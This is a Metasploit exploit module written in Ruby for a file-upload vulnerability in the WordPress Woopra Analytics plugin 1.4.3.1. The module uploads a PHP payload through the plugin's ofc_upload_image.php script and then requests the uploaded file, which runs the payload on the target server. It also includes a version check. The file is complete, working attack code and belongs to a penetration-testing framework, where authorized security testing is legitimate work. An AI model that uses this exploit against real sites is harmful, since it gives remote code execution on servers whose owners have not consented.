##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'WordPress Woopra Analytics File Upload',
      'Description'    => %q{
          The WordPress Woopra Analytics plugin contains an file upload vulnerability.
          We can upload arbitrary files to the upload folder, because the plugin also uses
          it's own file upload mechanism instead of the wordpress api it's possible to
          upload any file type.
      },
      'Author'         =>
        [
          'wantexz', # Vulnerability Discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '6903'],
          ['URL', 'http://packetstormsecurity.com/files/123525/']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WP Woopra Analytics 1.4.3.1', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 06 2013'
    ))
  end

  def check
    check_plugin_version_from_readme('woopra', '1.4.3.2')
  end

  def exploit
    print_status("#{peer} - Trying to upload payload")
    filename = "#{rand_text_alpha_lower(6)}.php"

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_plugins, 'woopra', 'inc', 'php-ofc-library', 'ofc_upload_image.php'),
      'ctype'    => 'text/plain',
      'vars_get' => {
        'name'   => "#{filename}"
      },
      'data' => payload.encoded
    )

    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri'    => normalize_uri(wordpress_url_plugins, 'woopra', 'inc', 'tmp-upload-images', filename) },
      5
    )
  end
end
